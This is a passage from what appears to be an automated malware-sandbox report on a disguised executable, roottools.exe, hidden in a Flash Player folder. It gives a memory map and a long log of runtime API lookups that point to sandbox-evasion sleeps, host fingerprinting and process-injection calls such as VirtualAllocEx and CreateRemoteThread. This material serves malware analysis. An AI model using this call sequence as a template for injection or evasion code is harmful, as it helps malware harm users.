| advapi32.dll | 0x77740000 | 0x777dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x777e0000 | 0x77814fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000778b0000 | 0x778b0000 | 0x779a9fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000779b0000 | 0x779b0000 | 0x77acefff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77ad0000 | 0x77c78fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77cb0000 | 0x77e2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Get Info | filename = STD_ERROR_HANDLE, type = file_type |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x759d5235 |
|
1 | |
| Mutex | Create | - |
|
1 | |
| Module | Get Handle | module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| Module | Get Filename | module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = OLEAUT32.DLL, base_address = 0x761b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x762170a1 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x761b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x761c3dcf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x761c07b7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x761e1ca9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x761c8e70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x761c7684 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x761ccc98 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x761f903a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x761c6231 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x761c5fea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x761d3f94 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x761d4e9e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x761fdb72 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x761e2a8c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x761fd737 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x761fe015 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x761fcc3d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x761fd1c4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x761fd48c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x761fd4c6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x761fd509 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x761ce7bb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x761ce496 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x761cddf1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x761fd53f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x76202055 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x762020ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x76202151 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x762021f5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x76202288 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x76202335 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x762023d5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x761d5934 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x761d5a98 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x761d59b4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x7622e405 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x7622ef07 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x7622f00a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x7622ef47 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x7622f15e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x7622dbd4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x7622ecfa |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x7622ea66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x7622d332 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x7622ee2e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x7622ca11 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x7622cc5f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x7622cde7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x7622c802 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x7622ec66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x7622d155 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x761cb0dc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x761e5f3e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x761d4fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x761d0d2c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x761e59ed |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x761bf8b8 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75b29d4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75af0782 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 |
|
2 | |
| Module | Load | module_name = SXS.DLL, base_address = 0x74e30000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x74e77685 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x758d7d2f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x758e3150 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x758fe7a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x758e5281 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x758e451a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x758e4413 |
|
1 | |
| Window | Create | class_name = ThunderRT6Main, wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors |
|
1 | |
| Window | Create | class_name = VBMsoStdCompMgr, wndproc_parameter = 0 |
|
1 | |
| Window | Set Attribute | class_name = VBMsoStdCompMgr, index = 0, new_long = 3612828 |
|
1 | |
| Window | Create | class_name = VBFocusRT6, wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 |
|
1 | |
| Window | Create | window_name = Langskallet7, wndproc_parameter = 0 |
|
1 | |
| Module | Load | module_name = KERNEL32 , base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadProcessMemory, address_out = 0x759ecfcc |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnumResourceTypesA, address_out = 0x75a50efd |
|
1 | |
| Module | Load | module_name = shell32, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76cb8af2 |
|
1 | |
| Module | Load | module_name = NTDLL, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwSetInformationProcess, address_out = 0x77ccfb18 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetDesktopWindow, address_out = 0x758e0a19 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 |
|
1 | |
| Module | Load | module_name = ntdll, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtYieldExecution, address_out = 0x77ccff2c |
|
1 | |
| System | Sleep | duration = 15 milliseconds (0.015 seconds) |
|
32 | |
| System | Sleep | duration = 8000 milliseconds (8.000 seconds) |
|
1 | |
| Module | Load | module_name = ntdll, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtProtectVirtualMemory, address_out = 0x77cd0028 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x759d53c6 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x759d196e |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x759d1826 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x75a545bf |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLongPathNameA, address_out = 0x75a5437f |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x759ed802 |
|
1 | |
| Module | Load | module_name = IPHlpApi, base_address = 0x756b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x756b9263 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 |
|
1 | |
| Module | Load | module_name = shell32, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76cb7078 |
|
1 | |
| Module | Load | module_name = User32, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EnumWindows, address_out = 0x758dd1cf |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EnumThreadWindows, address_out = 0x758e3961 |
|
1 | |
| Module | Unmap | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x759d7a2f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x759e10b5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x759d34d5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77ce45f5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x759ddd0e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x759d5a7e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x759fd4c4 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x759d103d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x759d1400 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x759ed9c8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x759fd075 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x759d5151 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x759ece2e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x759d17ec |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x759d469b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x759d1809 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x759d1886 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x759d1245 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x77d2742b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x759d7a10 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x759d11f8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x759f830d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x759d195e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x759ed851 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x759f5c1e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x759fc7ea |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a5416b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a5414b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
